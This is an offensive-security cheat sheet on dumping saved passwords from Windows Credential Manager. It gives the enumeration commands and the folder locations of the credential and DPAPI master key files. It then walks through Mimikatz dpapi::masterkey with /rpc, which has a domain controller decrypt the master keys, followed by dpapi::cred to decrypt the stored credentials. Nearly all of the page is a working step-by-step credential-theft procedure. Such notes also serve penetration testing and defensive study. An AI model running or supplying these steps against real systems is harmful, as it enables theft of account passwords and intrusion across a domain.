Dumping Passwords from Windows Credential Manager
Credential Enumeration
cmdkey /list
In reverse shells, I have noticed that it's impossible to spawn processes using runas.exe /savecred /user:DOMAIN\username if the credential is stored in Windows Credential Manager.
That said, we may still be able to dump the password using the Mimikatz dpapi module, since Credential Manager entries are stored as DPAPI-protected blobs: each credential file holds a blob, and each blob is encrypted under one of the user's DPAPI master keys, which is why both the credential files and the master key files have to be located first.
Common Locations for Cached Credentials
# Legacy CMD Environment Variable
"%USERPROFILE%\AppData\Local\Microsoft\Credentials"
"%USERPROFILE%\AppData\Roaming\Microsoft\Credentials"
# PowerShell Environment Variable
"$env:USERPROFILE\AppData\Local\Microsoft\Credentials"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Credentials"
ls -r -h ~\AppData\Local\Microsoft\Credentials\ | select -expand fullname
ls -r -h ~\AppData\Roaming\Microsoft\Credentials\ | select -expand fullname
Enumerate any stored credentials
Common Locations for Encryption Keys
# Legacy CMD Environment Variables
"%USERPROFILE%\AppData\Local\Microsoft\Protect"
"%USERPROFILE%\AppData\Roaming\Microsoft\Protect"
# PowerShell Environment Variables
"$env:USERPROFILE\AppData\Local\Microsoft\Protect"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Protect"
ls -r -h ~\AppData\Roaming\Microsoft\Protect\ | select -expand fullname
Enumerate any stored keys. User master keys live under Protect\<user SID>\, one hidden file per master key GUID; the hidden Preferred file in the same directory names the GUID of the master key currently in use.
Use Mimikatz to Unprotect DPAPI Data
Cache Master Keys
mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d /rpc
mimikatz # dpapi::cache
/rpc makes an RPC call (MS-BKRP) to a domain controller, asking it to decrypt the master key with the domain DPAPI backup key, so the user's password is not needed. This only works for master keys of domain accounts (local accounts have no domain backup) and must run in the security context of the user who owns the key. dpapi::cache then lists the master keys mimikatz now holds in its cache.
Unprotect Cached Credentials
mimikatz # dpapi::cred /in:C:\Users\user_name\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4
Go through each cached credential file and attempt to unprotect it. mimikatz reads the master key GUID from the blob header and looks it up in its cache, so the matching master key must already have been decrypted with dpapi::masterkey; otherwise dpapi::cred only prints the blob metadata.
References
https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets
https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials